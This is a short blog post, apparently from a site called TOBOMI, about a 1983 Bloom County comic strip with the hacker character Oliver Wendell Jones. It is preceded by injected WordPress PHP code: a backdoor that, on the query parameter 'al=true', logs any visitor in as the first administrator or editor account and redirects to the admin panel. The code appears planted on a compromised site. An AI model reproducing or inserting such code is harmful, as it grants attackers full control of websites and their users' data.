// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Can you say déja vu?!? | TOBOMI

Can you say déja vu?!?

I mean, seriously.

This Bloom County strip was brought to my attention tonight by CB_Chef of Twitter. He quoted it in a tweet, I correctly IDed the quote, thinking he was paraphrasing….

Turns out he wasn’t.

And thus, I give you a 100% relevant comic from 1983, today.

I swear, before Anonymous hacking into corporations, there was Oliver Wendell Jones.

http://www.gocomics.com/bloomcounty/1983/10/23

Posted in Teknobabble

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.